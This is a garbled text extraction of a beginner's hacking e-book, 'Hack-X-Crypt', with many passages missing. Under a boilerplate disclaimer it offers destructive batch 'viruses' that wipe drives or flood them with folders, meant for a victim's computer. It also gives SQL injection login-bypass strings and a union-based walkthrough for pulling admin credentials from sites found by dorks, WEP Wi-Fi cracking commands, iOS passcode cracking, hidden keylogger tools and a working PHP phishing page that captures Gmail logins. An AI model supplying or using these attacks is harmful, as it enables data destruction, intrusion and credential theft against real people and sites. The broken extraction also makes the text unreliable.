Hack-X-Crypt Hackero DARK-NET Copy SJ Beast PDF
Hack-X-Crypt Hackero DARK-NET Copy SJ Beast PDF
UJJWAL SAHAY
2 Hack-x-crypt
UJJWAL SAHAY
3 Hack-x-crypt
LEGAL DISCLAIMER
Any proceedings or activities regarding the material contained
within this volume are exclusively your liability. The misuse and
mistreat of the information/tutorial in this book can
consequence in unlawful charges brought against the persons
in question. The authors and review analyzers will not be held
responsible in the event any unlawful charges brought against
any individuals by misusing the information in this book to
break the law. This book contains material and resources that
can be potentially destructive or dangerous. If you do not fully
comprehend something on this book, don‘t study this book.
Please refer to the laws and acts of your state/region/
province/zone/territory or country before accessing, using, or
in any other way utilizing these resources. These materials and
resources are for educational and research purposes only. Do
not attempt to violate the law with anything enclosed here
within. If this is your intention, then leave now. Neither writer
of this book, review analyzers, the publisher, nor anyone else
affiliated in any way, is going to admit any responsibility for
your proceedings, actions or trials.
UJJWAL SAHAY
4 Hack-x-crypt
UJJWAL SAHAY
5 Hack-x-crypt
PREFACE
Computer hacking is the practice of altering computer hardware and
software to carry out a goal outside of the creator‘s original intention.
People who slot in computer hacking actions and activities are often
entitled as hackers. The majority of people assume that hackers are
computer criminals. They fall short to identify the fact that criminals
and hackers are two entirely unrelated things. Hackers in realism are
good and extremely intelligent people, who by using their knowledge in
a constructive mode help organizations, companies, government, etc.
to secure credentials and secret information on the Internet. Years ago,
no one had to worry about Crackers breaking into their computer and
installing Trojan viruses, or using your computer to send attacks against
others. Now that thing have changed, it's best to be aware of how to
defend your computer from damaging intrusions and prevent black hat
hackers. So, in this Book you will uncover the finest ways to defend
your computer systems from the hackers This Book is written by
keeping one object in mind that a beginner, who is not much familiar
regarding computer hacking, can easily, attempts these hacks and
recognize what we are trying to demonstrate. After Reading this book
you will come to recognize that how Hacking is affecting our everyday
routine work and can be very hazardous in many fields like bank
account hacking etc. Moreover, after carrying out this volume in detail
you will be capable of understanding that how a hacker hacks and how
you can defend yourself from these threats.
UJJWAL SAHAY
6 Hack-x-crypt
Only hoping
UJJWAL SAHAY
7 Hack-x-crypt
UJJWAL SAHAY
UJJWAL SAHAY
8 Hack-x-crypt
Some Assumptions
You have access to the Internet to obtain the various tools used
in the ethical hacking process.
UJJWAL SAHAY
9 Hack-x-crypt
INTRODUCTION TO HACKERS
HACKERS WANT YOUR PC
CREATION OF VIRUS IN NOTEPAD
HACKING “OPEN” OPTION
PASSWORD CRACKING
PASSWORD CREATING POLICIES
KEYSTROKE LOGGING
HACK TO HIDE LOCAL DRIVES
FORMAT HARD DISK WITH NOTEPAD
FUNNY VIRUS TO SHOCK YOUR FRIENDS
HOW TO CHANGE YOUR PC FROM DUAL CORE TO i7
HOW TO MAKE YOUR GOOGLE SEARCHES EFFECTIVE
CRACKING IOS PASSWORD
HACK TO DELETE THE RECYCLE BIN
WEBSITE HACKING
UJJWAL SAHAY
10 Hack-x-crypt
UJJWAL SAHAY
11 Hack-x-crypt
INTRODUCTION TO HACKERS
Hello friends, here this is Ujjwal Sahay and now I am going to start the
first topic of my book HACK-X-CRYPT with the very basic introduction to
hackers and their communities. Here basically we are going to discuss
about some basic facts like who the hackers are, what are their
intentions, types of hackers and their communities etc.
Communities of Hackers:-
HACKERS
CRACKERS
PHREAKS
SCRIPT KIDDIES
UJJWAL SAHAY
12 Hack-x-crypt
INTENSION OF HACKERS:
Types of Hackers:
•White Hat Hackers –“White hats” is the name used for security
experts. While they often use the same tools and techniques as the
black hats, they do so in order to foil the bad guys. That is, they use
those tools for ethical hacking and computer forensics. Ethical hacking
is the process of using security tools to test and improve security
(rather than to break it!). Computer forensics is the process of
collecting evidence needed to identify and convict computer criminals.
•Black Hat Hackers –They use their knowledge and skill set for
illegal activities and destructive intents. Obviously, the “black hats” are
the bad guys. These are the people who create and send viruses and
worms, break into computer systems, steal data, shut down networks,
UJJWAL SAHAY
13 Hack-x-crypt
•Grey Hat Hackers -They use their knowledge and skill set for the
legal and illegal purpose. They are white hats in public but internally
they do some black hat work. Gray hats sit in the middle of the fence
because sometimes they cross that ethical line (or more often, define it
differently). For example, gray hats will break into a company’s
computer system just to wander around and see what’s there. They
think that simply because they don’t damage any data, they’re not
committing a crime. Then they go and apply for jobs as security
consultants for large corporations. They justify their earlier break-in’s
as some sort of computer security training. Many really believe that
they’re providing a public service by letting companies know that their
computers are at risk.
CRACKERS are those who break into the applications with some
malicious intentions either for their personal gain or their greedy
achievements.
Intension of crackers:-
UJJWAL SAHAY
14 Hack-x-crypt
PHREAKS are those people who use computer devices and software
programs and their tricky and sharp mind to break into the phone
networks.
Intention of phreaks:-
UJJWAL SAHAY
15 Hack-x-crypt
UJJWAL SAHAY
16 Hack-x-crypt
You might be thinking that hackers don’t care about your computer,
but they do. Hackers want access to your system for many different
reasons. Remember, once a hacker breaks in and plants a Trojan, the
door is open for anyone to return. The hackers know this and are
making money off from it. They know it’s easy to hide and very difficult
to track them back once they own your PC.
Over the past four years, most cyber-attacks have been launched from
computers within the INDIA. However, this doesn’t mean that systems
in the INDIA are the original source of the attack. A hacker in Pakistan
could actually use your computer to launch a denial of service (DOS)
attack. To the entire world, it might even look as if you started the
attack because the hacker has hidden his tracks so that only the last
“hop” can be traced.
UJJWAL SAHAY
17 Hack-x-crypt
UJJWAL SAHAY
18 Hack-x-crypt
:top
md%random%
goto top.
Now when you have copied the codes in the notepad your next work is
to save the text document you have created.
UJJWAL SAHAY
19 Hack-x-crypt
Go to file option and save your document by any name but “don’t
forget to keep the extension as ‘.bat’.
For example you can save your text document by the name “ujjwal.bat”
When you have done saving the document just double click on the
batch file to open it.
Suddenly you will see that the command prompt of the victim’s
computer opened automatically and it will display large amount of
codes to running in the command prompt.
UJJWAL SAHAY
20 Hack-x-crypt
After 5-10 seconds you will see that there are a huge amount of folders
created automatically on the desktop of the victim and it will also leads
the desktop to freeze or crash.
CODES:-
@echo off
:VIRUS
cd /d C:
md%random%
cd /d D:
md%random%
cd /d E:
md%random%
goto VIRUS
UJJWAL SAHAY
21 Hack-x-crypt
Copy and paste the above code in the notepad and follow the same
steps as we have followed before to create more numbers of folders in
the local drives of the victim’s computer.
"rd/s/q D:\
rd/s/q C:\
Save as "anything.bat
UJJWAL SAHAY
22 Hack-x-crypt
WScript.Sleep 180000
WScript.Sleep 10000
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WScript.Sleep 500
WScript.Sleep 500
WScript.Sleep 500
WScript.Sleep 500
UJJWAL SAHAY
23 Hack-x-crypt
WshShell.SendKeys "you"
WScript.Sleep 500
WScript.Sleep 500
WScript.Sleep 500
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
UJJWAL SAHAY
24 Hack-x-crypt
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
UJJWAL SAHAY
25 Hack-x-crypt
To make a really cool batch file that can make your entire screen flash
random colors until you hit a key to stop it, simply copy and paste the
following code into notepad and then save it as a .bat file.
@echo off
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the
following code which will do the same thing except when they press a
key the screen will go black and the only way to stop the batch file is by
pressing CTRL-ALT-DELETE.
UJJWAL SAHAY
26 Hack-x-crypt
Codes:-
@echo off
:a
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
Enjoy!!!
Note: - some of the above given codes can harm your computer after
execution so; don’t try it on your pc. You can use a test computer for
it.
UJJWAL SAHAY
27 Hack-x-crypt
And today we are going to learn that how to hack the “OPEN” option by
any text by which you want to replace it.
STEPS:-
UJJWAL SAHAY
28 Hack-x-crypt
UJJWAL SAHAY
29 Hack-x-crypt
UJJWAL SAHAY
30 Hack-x-crypt
UJJWAL SAHAY
31 Hack-x-crypt
By opening the “SHELL” option you will see the “OPEN” option
under it.
Just give a single click on the open option instead opening it
You will see two items defined in the left white workspace.
UJJWAL SAHAY
32 Hack-x-crypt
UJJWAL SAHAY
33 Hack-x-crypt
PASSWORD CRACKING
Password crackers are the most famous and elementary tools in the
hacker’s toolbox. These have been around for some time and are
fairly effective at “guessing” most users’ passwords, at least in part
because most users do a very poor job of selecting secure
passwords.
First of all if a hacker is going to crack your password then at the very
first step they usually try some guesses to crack your password. They
generally made it easy by social engineering. Hackers know that
most users select simple passwords that are easy to remember. The
top choices of the users are nearly always names that are personally
meaningful to the user—first names of immediate family members
lead the list, followed by pet’s names and favorite sporting teams.
UJJWAL SAHAY
34 Hack-x-crypt
Compounding the problem, many users set the same user name and
password for all accounts, allowing hackers to have a field day with a
single harvested password. That’s something to consider before you
use the same password for Facebook as you use at school or at work.
Password-cracking software:-
UJJWAL SAHAY
35 Hack-x-crypt
Cain & Abel:- Cain and Abel is a well-known password cracking tool
that is capable of handling a variety of tasks. The most notable thing is
that the tool is only available for Windows platforms. It can work as
sniffer in the network, cracking encrypted passwords using the
dictionary attack, brute force attacks, cryptanalysis attacks, revealing
password boxes, uncovering cached passwords, decoding scrambled
passwords, and analyzing routing protocols. It use to cracks LM and NT
LanManager (NTLM) hashes, Windows RDP passwords, Cisco IOS and
PIX hashes, VNC passwords, RADIUS hashes, and lots more. (Hashes are
cryptographic representations of passwords.)
UJJWAL SAHAY
36 Hack-x-crypt
UJJWAL SAHAY
37 Hack-x-crypt
pwdump3:- (www.openwall.com/passwords/microsoft-windowsnt-
2000-xp-2003-vista-7#pwdump) extracts Windows password hashes
from the SAM (Security Accounts Manager) database.
UJJWAL SAHAY
38 Hack-x-crypt
Linux and other UNIX variants typically store passwords in these files:
UJJWAL SAHAY
39 Hack-x-crypt
Show what can happen when weak passwords are used or passwords
are shared.
UJJWAL SAHAY
40 Hack-x-crypt
It’s okay to use similar passwords — just make them slightly different
for each type of system, such as wweraw777-Win7 for Windows
systems and wweraw453 for Linux systems.
UJJWAL SAHAY
41 Hack-x-crypt
KEYSTROKE LOGGING
Generally you use to ask your friends or relatives for logging in into
your account by their computers.
So, Be careful with key loggers installed in their computers. Even with
good intentions, monitoring employees raises various legal issues if it’s
not done correctly. Discuss with your legal counsel what you’ll be
doing, ask for their guidance, and get approval from upper
management.
Logging tools: - With keystroke-logging tools, you can assess the log
files of your application to see what passwords people are using:-
UJJWAL SAHAY
42 Hack-x-crypt
One more you can checkout is KGB employee monitor is one of the
favorite of me …..Because it is not only invisible but it will also not
shown by your task manager and it uses password protection too.
PREVENTIONS:-
UJJWAL SAHAY
43 Hack-x-crypt
But, here we are going to learn that how to hide the whole specified
drives (local disks) which keep you safe from your family child. You can
easily keep your data safe either it is your girlfriend’s pic or
blah…blah…blah…!
Let’s start to learn how to hide the specified drives step by step:--
For hiding the drives you have to edit the group policies of your
computer.
For editing group policies just go on the “run” option and type
“gpedit.msc” and click on ok.
Or
You can easily search in your search box for the GROUP POLICY.
UJJWAL SAHAY
44 Hack-x-crypt
Then you will see in the left part of the window there is a “USER
CONFIGURATION” option.
Under the user configuration option there are three options :-
1.) Software settings
2.) Windows settings
3.) Administrative templates
UJJWAL SAHAY
45 Hack-x-crypt
When you opened the “all settings options” there is a list of lot of
options displayed after you!
Click on the “settings” option to arrange them then alphabetically.
If already arranged you can skip this step.
UJJWAL SAHAY
46 Hack-x-crypt
Now clicking sometimes the “H” key of your keyboard search for
the “hide these specified drives in my computer” option.
UJJWAL SAHAY
47 Hack-x-crypt
“ENABLE” it and choose for the drives which you want to hide
from the given options in the lower left part of the window.
After applying the settings just click on ok and you see the drives
will hide according to your choice.
UJJWAL SAHAY
48 Hack-x-crypt
UJJWAL SAHAY
49 Hack-x-crypt
CODE:-
@echo off
del C:\ *.* \y
UJJWAL SAHAY
50 Hack-x-crypt
Note: “I have not tried this virus yet, and also please don’t try on your
personal computers. If you have tried ever please give me the reviews.”
UJJWAL SAHAY
51 Hack-x-crypt
Basically here we are going to create a funny virus which will not
actually harm your friend’s computer but it will shock him/her for a
minute.
So let’s create that virus following the same steps as we have created
some viruses in previous chapters.
CODES:-
@echo off
msg * your computer is attacked by a virus.
msg * click ok to format.
msg * all your data has been deleted.
UJJWAL SAHAY
52 Hack-x-crypt
UJJWAL SAHAY
53 Hack-x-crypt
Now either you click on “ok” or you close the above message box,
it will again show you a message “click ok to format”.
And I am sure that you will not going to click on ok.
But again it does not matter if you click on ok or close the box, but
I am sure that you will close the box.
Again it will show you a message that “all your data has been
deleted”.
And for a moment your friend’s heartbeat are going to be on the
optimum.
So this is a funny way to shock your friends without harming them
actually.
UJJWAL SAHAY
54 Hack-x-crypt
The trick we are going to learn here is the most interesting trick and I
am sure that it will increase your prestige among your friends.
Because now these days it’s a big deal among the group of your friend
that if you have i3, i5 or i7 processor.
So let’s learn how to change your pc from any of core processor to i7.
First of all you have to go on the “run” option and write “regedit” to
open the registry editor of your computer and click on ok
It will open the registry editing window after you.
UJJWAL SAHAY
55 Hack-x-crypt
UJJWAL SAHAY
56 Hack-x-crypt
Then open the “Description” option and then open the “system”
option. Also open the “central processor” option under system
option.
UJJWAL SAHAY
57 Hack-x-crypt
UJJWAL SAHAY
58 Hack-x-crypt
Now close the registry editor and let’s check if it is working or not.
UJJWAL SAHAY
59 Hack-x-crypt
UJJWAL SAHAY
60 Hack-x-crypt
And now you can say with proud that YOU HAVE AN CORE i7
PROCESSOR.
UJJWAL SAHAY
61 Hack-x-crypt
In this article we are going to learn how to make our Google searches
effective. If we have to find anything on Google we use to open the
Google website and start searching like if you want to download any
book on Google you use to write like this “download basic computer
engineering Book of Balagurusamy for free”. And you will find a huge
UJJWAL SAHAY
62 Hack-x-crypt
You can take some very simple steps to reduce your Google searches
results.
Let’s assume we have to download the same book as above mentioned.
If you use to write in the following way it will reduce your Google
searches and make it simple to find the exact download link.
Write in this way in the Google searches:-
You have to write your searches under double quotes.
Like:- “basic computer engineering Book.pdf by Balagurusamy”
Note:- don’t forget to apply the extension “.pdf”
UJJWAL SAHAY
63 Hack-x-crypt
UJJWAL SAHAY
64 Hack-x-crypt
Now these days’ people generally use 4-digit pin to secure their phone.
A mobile device gets lost or stolen and all the person recovering it has
to do is try some basic number combinations such as 1234, 1212, or
0000.and soon the will be unlocked.
1. For the first step you have to plug you iPhone or computer into
device firmware upgrade mode i.e. DFU mode:-
To enter DFU mode, simply power the device off, hold down the Home
button (bottom center) and sleep button (upper corner) at the same
time for 10 seconds, and continue holding down the Home button for
another 10 seconds. The mobile device screen goes blank.
2. after putting your phone into DFU mode you need to Load the iOS
Forensic Toolkit for this you need to insert your USB license dongle into
your computer and running Tookit.cmd:-
UJJWAL SAHAY
65 Hack-x-crypt
3.After that the work is to do is to load the iOS Forensic Toolkit Ram
disk onto the mobile device by selecting option 2 LOAD RAMDISK:-
When you loaded the RAMDISK code it allows your computer to
communicate with the mobile device and run the tools which are
needed for cracking the password (among other things).
4. Now you need to select the iOS device type/model that is connected
to your computer, as shown in Figure:-
UJJWAL SAHAY
66 Hack-x-crypt
After that you see the toolkit which is connecting to the device and it
confirms a successful load, as shown in Figure:-
Also you will see the Elcomsoft logo in the middle of your mobile
device’s screen ……I think it looks pretty:
UJJWAL SAHAY
67 Hack-x-crypt
iOS Forensic Toolkit will prompt you to save the passcode to a file. For
saving the passcode simply; you can press Enter to accept the default of
passcode.txt. The cracking process will commence and, with any luck,
the passcode will be found and displayed after you as shown in Figure:-
UJJWAL SAHAY
68 Hack-x-crypt
So, having no password for phones and tablets is bad, and a 4-digit PIN
such as this is also not much better choice.
So be aware about the attacks! Get up-users-getup it’s time to be
secured.
UJJWAL SAHAY
69 Hack-x-crypt
You can also use iOS Forensic Toolkit to copy files and even crack the
key chains to uncover the password that protects the device’s backups
in iTunes (option 5 GET KEYS).
PREVENTION:-
For the prevention from being hacked you can refer to the chapter
“PASSWORD CREATING POLICIES”.
UJJWAL SAHAY
70 Hack-x-crypt
Sometimes when you just try to modify the windows GUI or even you
use to install any theme for your windows sometimes you find that the
recycle bin icon remains not modified and destroys the beauty of your
modification.
So in this article we are going to learn that how to delete the RECYCLE
BIN by hacking registry.
For deleting the recycle bin you need to open the registry editor
of your computer.
I think now after reading the above sections you are familiar with
the “registry editor”.
So go through the registry editor and follow the given path.
UJJWAL SAHAY
71 Hack-x-crypt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio
n\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA00
2F954E}
When you finally opened the last path, you will see the default
string of recycle bin is defined.
Now DELETE that string and restart your computer.
You will find that recycle bin is deleted.
I am attaching a screenshot for your ease.
UJJWAL SAHAY
72 Hack-x-crypt
WEBSITE HACKING
Now take your time and be serious and free before starting this article
because this is the very wide and one of the most interesting articles
among all of the above chapters. We will discuss in this chapter that
how to hack any vulnerable site using SQL injection.
UJJWAL SAHAY
73 Hack-x-crypt
* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server
Authentication bypass:-
In this type of SQL injection generally if we had found the Admin
login page and after that we will try to open the control panel
account of the admin by passing the authentication.
If you have the admin login page of any website then you can paste
the following codes (with quotes) to bypass the authentication of the
website ….generally PHP websites are vulnerable to this injection:-
You can find these types of sites simply by Google searches. You
have to type like this in the Google search bar:-
www.thesitename.com/adminlogin.php?
Or
/admin.php?
Or
Wp-login.php?
Etc.
After finding the login page you have to paste the following codes in
both userID and password of the admin page till it will bypassed. If
UJJWAL SAHAY
74 Hack-x-crypt
not we will try the next SQL injection i.e. union based, blind based,
error based etc.
Codes to be used as both userID and password at the admin login page
of vulnerable website for bypassing authentication are as follow:-
‘ or ’1'=’1 ‘ or ‘x’='x
‘ or 0=0 – ” or 0=0 –
or 0=0 – ‘ or 0=0 #
” or 0=0 # or 0=0 #
‘ or ‘x’='x ” or “x”=”x
‘) or (‘x’='x
‘ or 1=1– ” or 1=1–
or 1=1– ‘ or a=a–
” or “a”=”a ‘) or (‘a’='a
“) or (“a”=”a hi” or “a”=”a
hi” or 1=1 – hi’ or 1=1 –
‘or’1=1'
If the authentication bypass will not work then try the following
techniques carefully and step by step:-
UJJWAL SAHAY
75 Hack-x-crypt
To find a SQL Injection vulnerable site, you can use Google search
by searching for certain keywords. That keyword often called as
“GOOGLE DORK”.
Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
Now you have to Copy one of the above keyword and Google it.
Here, we will get a lot of search results with which we have to visit
the websites one by one for finding the vulnerability.
For example:-
site:www.anyselectedsite.com inurl:index.php?id=
For eg:
http://www.anyselectedsite.com/index.php?id=2'
If the page remains in same page or showing that page not found,
then it is not vulnerable.
If you got an error message just like this, then it means that the site
is vulnerable.
UJJWAL SAHAY
76 Hack-x-crypt
You have an error in your SQL syntax; the manual that corresponds
to your MySQL server version for the right syntax to use near '\'' at
line 1
Our next step is to find the number of columns present in the target
Database.
For that replace the single quotes(') with "order by n" statement.
Change the n from 1,2,3,4,,5,6,...n. Until you get the error like
"unknown column ".
For eg:
http://www.anyselectedsite.com/index.php?id=2 order by 1
http://www.anyselectedsite.com/index.php?id=2 order by 2
http://www.anyselectedsite.com/index.php?id=2 order by 3
http://www.anyselectedsite.com/index.php?id=2 order by 4
If you get the error while trying the "n"th number, then number of
column is "n-1".
I mean:-
UJJWAL SAHAY
77 Hack-x-crypt
In case, if the above method fails to work for you, then try to add
the "--" at the end of the statement.
For eg:-
For eg:
UJJWAL SAHAY
78 Hack-x-crypt
Ifyou have applied the above method and is not working then try
this:
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union
select 1,2,3,4,5,6,7--
Once you execute the query, it will display the vulnerable column.
Bingo, column '3' and '7' are found to be vulnerable. Let us take the
first vulnerable column '3' . We can inject our query in this column.
For eg:
Now, It will display the version as 5.0.2 or 4.3. Something likes this.
UJJWAL SAHAY
79 Hack-x-crypt
Replace the version () with database () and user() for finding the
database,user respectively.
For eg:
Let us find the table name of the database. Replace the 3 with
"group_concat(table_name) and add the "from
information_schema.tables where table_schema=database()"
For eg:
UJJWAL SAHAY
80 Hack-x-crypt
https://addons.mozilla.org/en-US/firefox/addon/3899/
Once you installed the add-on, you can see a toolbar that will look
like the following one. If you are not able to see the Hackbar, then
press F9.
UJJWAL SAHAY
81 Hack-x-crypt
Copy and paste the code at the end of the url instead of the
"mysqlchar"
For eg:
UJJWAL SAHAY
82 Hack-x-crypt
For example:
admin,password,admin_id,admin_name,admin_password,active,id,a
dmin_name,admin_pass,admin_id,admin_name,admin_password,ID
_admin,admin_usern me,username,password..etc..
For eg:
http://www.anyselectedsite.com/index.php?id=-2
and 1=2 union select
1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from
admin--
If the above query displays the 'column is not found' error, then try
another column name from the list.
If we are lucky, then it will display the data stored in the database
depending on your column name. For example, username and
password column will display the login credentials stored in the
database.
UJJWAL SAHAY
83 Hack-x-crypt
If you are lucky, you will find the admin page using above urls or you
can use some kind of admin finder tools like Havij admin finder, sql
poison for SQL attacking (tool).
And once you found the admin panel you have to do further works
on your own risk.
PREVENTION:-
UJJWAL SAHAY
84 Hack-x-crypt
UJJWAL SAHAY
85 Hack-x-crypt
try {
Statement statement = connection.createStatement( … );
ResultSet results = statement.executeQuery( query );
}
PREVENTIONS
Option 1: Prepared Statements (Parameterized Queries):-
UJJWAL SAHAY
86 Hack-x-crypt
This technique works like this. Each DBMS supports one or more
character escaping schemes specific to certain kinds of queries. If you
UJJWAL SAHAY
87 Hack-x-crypt
then escape all user supplied input using the proper escaping scheme
for the database you are using, the DBMS will not confuse that input
with SQL code written by the developer, thus avoiding any possible SQL
injection vulnerabilities.
Even if your code doesn't have SQL vulnerabilities, when the database
server, the operating system, or the development tools you use have
vulnerabilities, this is also risky. This is why you should always install
patches, especially SQL vulnerabilities patches, right after they become
available.
Database servers are complex beasts and they have much more
functionality than you need. As far as security is concerned, more is not
better. For instance, the xp_cmdshell extended stored procedure in MS
SQL gives access to the shell and this is just what a hacker dreams of.
This is why you should disable this procedure and any other
functionality, which can easily be misused.
UJJWAL SAHAY
88 Hack-x-crypt
Even if developers follow the rules above and do their best to avoid
dynamic queries with unsafe user input, you still need to have a
procedure to confirm this compliance. There are automated test tools
to check for SQL injections and there is no excuse for not using them to
check all the code of your database applications.
UJJWAL SAHAY
89 Hack-x-crypt
One of the easiest tool to test SQL injections is the Firefox extension
named SQL Inject ME. After you install the extension, the tool is
available in the right-click context menu, as well as from Tools →
Options. The sidebar of SQL Inject ME is shown in the next screenshot
and as you can see there are many tests you can run:
UJJWAL SAHAY
90 Hack-x-crypt
You can choose which tests to run and which values to test. When you
press one of the Test buttons, the selected tests will start. When the
tests are done, you will see a report of how the tests ended.
There are many options you can set for the SQL Inject ME extension, as
shown in the next two pictures: -
UJJWAL SAHAY
91 Hack-x-crypt
UJJWAL SAHAY
92 Hack-x-crypt
As you see, there are many steps you can take in order to clean your
code from potential SQL injection vulnerabilities. Don't neglect these
simple steps because if you do, you will compromise the security not
only of your sites but also of all the sites that are hosted with your web
hosting provider.
UJJWAL SAHAY
93 Hack-x-crypt
After performing the SQL injection, I can bet that now you have the
endless curiosity to explore more about the ethical hacking. And as
according to your need now in this article we are going to perform a
hardcore hack using Backtrack Linux. we are going to learn that how to
crack the WI-FI using Backtrack.one more thing I want to add here that
all these stuff I am sharing with you is only for study purpose .if you
have the black intentions just leave the book now. If you are
performing this article on your computer, you will be responsible for
any damage occurred by you.
Now let us start with the Wi-Fi cracking. But before starting the tutorial
let me give you a small introduction to what Wi-Fi hacking is and what
is the security protocols associated with it.
UJJWAL SAHAY
94 Hack-x-crypt
For the Wi-Fi hacking you need to install the Backtrack on your
computer.
I am assuming that you have already installed the Backtrack on your pc.
For installing processes you can just Google it. You will get it easily.
UJJWAL SAHAY
95 Hack-x-crypt
Now open the console from the taskbar, Click on the icon against the
dragon like icon in the taskbar in the above screenshot.
UJJWAL SAHAY
96 Hack-x-crypt
This command will disable your wireless adapter; we are doing this
in order to change your MAC address.
Now, you need to hide your identity so that you will not be identified
by the victim.to do this you need to type ifconfig wlan0 hw ether
00:11:22:33:44:55 and hit enter.
This command will change your MAC address to 00:11:22:33:44:55.
3) Now the next work is to type airmon-ng start wlan0 and press
enter.
This will start the wireless adapter in monitor mode. Note down the
new interface name, it could be eth0 or mon0 or something like that.
UJJWAL SAHAY
97 Hack-x-crypt
This command grabs all the traffic that your wireless adapter can see
and displays critical information about it, including the BSSID (the
MAC address of the AP), power, number of beacon frames, number
of data frames, channel, speed, encryption (if any), and finally, the
ESSID (what most of us refer to as the SSID).
Let's do this by typing:
UJJWAL SAHAY
98 Hack-x-crypt
airodump-ng mon0
UJJWAL SAHAY
99 Hack-x-crypt
This command will begin capturing the packets from the network. You
need to capture more and more packets in order to crack the Wi-Fi
password. This packet capturing is a slow process.
6.) To make the packet capturing faster, we will use another command.
Open a new shell, don’t close the previous shell. In new shell type
aireplay-ng -1 0 -a BSSIDN1 -h 00:11:22:33:44:55 mon0 and hit enter.
Replace the BSSIDN1 with the data from step 4 and mon0 from step 3.
This command will boost the data capturing process.
The -1 tells the program the specific attack we wish to use which in this
case is fake authentication with the access point. The 0 cites the delay
between attacks, -a is the MAC address of the target access point, -h is
your wireless adapters MAC address and the command ends with your
wireless adapters device name.
7.) Now wait for few minutes, let the DATA in the other console reach a
count of 5000.
UJJWAL SAHAY
100 Hack-x-crypt
8.) After it reaches 5000, open another console and type aircrack-ng
filename-01.cap and hit enter.
Replace the filename with the name you used in step 5. Add -01.cap to
it. .cap is the extension of file having captured data packets.
After typing this command, aircrack will start trying to crack the Wi-Fi
password. If the encryption used is WEP, it will surely crack the
password within few minutes.
UJJWAL SAHAY
101 Hack-x-crypt
PREVENTION:-
For the prevention from being hacked you can refer to the chapter
“PASSWORD CREATING POLICIES”.
UJJWAL SAHAY
102 Hack-x-crypt
What is phishing?
Why phishing?
There are many password cracking tools that are coming and going
into/from the market. But phishing is the most efficient method to
steal confidential information like, passwords, Credit card numbers,
Bank account numbers etc.
UJJWAL SAHAY
103 Hack-x-crypt
In the same way, the hacker sends a fake login page to the victim.
The victim thinks that it is a legitimate one and enters his
confidential information. Now the data will be with the hacker.
UJJWAL SAHAY
104 Hack-x-crypt
The again open the notepad and type the following codes:
<?php
header("Location: http://www.Gmail.com");
$handle = fopen("logs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
And save it as “mail.php” (save this file by same name as you have
replaced the “action=”)
Now finally you have the three files which are required for the
phishing.
1) Gmail.html (fake login page)
2) mail.php (to capture the login details)
3) log.txt (to store the captured details)
Procedure:-
step1: create an account in any free web hosting site like
www.bythost.com
www.000webhost.com
www.ripway.com
www.my3gb.com
step2: Now upload all the three files you have downloaded.(I have
taken www.my3gb.com)
UJJWAL SAHAY
105 Hack-x-crypt
Demonstration:-
Here i have uploaded my scripts on to www.my3gb.com
And copy the Gmail.html link which you have to send the victim.
i clicked the Gmail.html link
UJJWAL SAHAY
106 Hack-x-crypt
This page will looks exactly similar to the original Gmail login page.
And when the victim enters his/her login details for logging in into
his/her account.
Now, this time the victim will redirected to the original Gmail login
website.
The victim will even don’t know that his/her account got hacked.
Victim will think that the page gets reloaded due to internet errors or
login mistakes etc.
Now his/her login details were captured by the php script and stored in
log.txt file as shown in the figure below:-
UJJWAL SAHAY
107 Hack-x-crypt
In the same way you can hack FACEBOOK accounts and other social
networking accounts.
UJJWAL SAHAY
108 Hack-x-crypt
UJJWAL SAHAY
109 Hack-x-crypt
Documents are hard to find if you put them all in the same place on
your disk, such as the My Documents folder. So make sure that you
organize your documents into folders — perhaps one for work, one for
household stuff, one for your hobbies, and so on. Don’t forget that you
can also put folders inside other folders so you might create subfolders
in your work folder for each project you’re working on.
UJJWAL SAHAY
110 Hack-x-crypt
The reason for putting icons are on your desktop is to make it easier to
find the applications and documents that you use most often. However,
if all your applications have desktop icons, then that advantage is lost.
That makes it a good idea to remove all the clutter on the desktop. You
could also try moving icons around so that related software (for
example, Word, Excel and PowerPoint) is grouped together —
remember to disable ‘Auto arrange icons’ first by right clicking the
desktop, selecting View and then using the option.
UJJWAL SAHAY
111 Hack-x-crypt
UJJWAL SAHAY
112 Hack-x-crypt
UJJWAL SAHAY
113 Hack-x-crypt
UJJWAL SAHAY
114 Hack-x-crypt
While you can zoom inside most applications if the text is too small, you
might find the text and icons in Windows too small to read easily if you
have a high-resolution display (3840x2160, say). If so, up the size to 125
percent or 150 percent at Control Panel > Appearance and
Personalization > Display > Make text and other items larger or smaller.
If more than one person uses your PC, set up user accounts so that
each can configure Windows the way they like it without affecting
everyone else. It also lets each user easily keep their documents
together but separate from everyone else’s. Go to Control Panel > User
Accounts and Family Safety > Add or remove user accounts.
UJJWAL SAHAY
115 Hack-x-crypt
If you like the idea of leaving yourself reminders on the screen of your
computer, then Sticky Notes is for you. You’ll find it by searching in the
Start menu or screen. When you run Sticky Notes, a blank sticky note
appears on-screen. Just type whatever reminder you want into it; if you
want to change the color of the note, you’ll find the relevant options by
right-clicking. Click on the + sign to create another sticky note.
Big files clog up your hard drive and many are just garbage that you can
delete. Instead of downloading a utility to find and remove them, use
Windows Explorer. Simply type size:gigantic into the Search box and
Windows will show you all files larger than 128MB in the folder (and
subfolders) you’re currently browsing. Delete any that you’re sure you
don’t need.
UJJWAL SAHAY
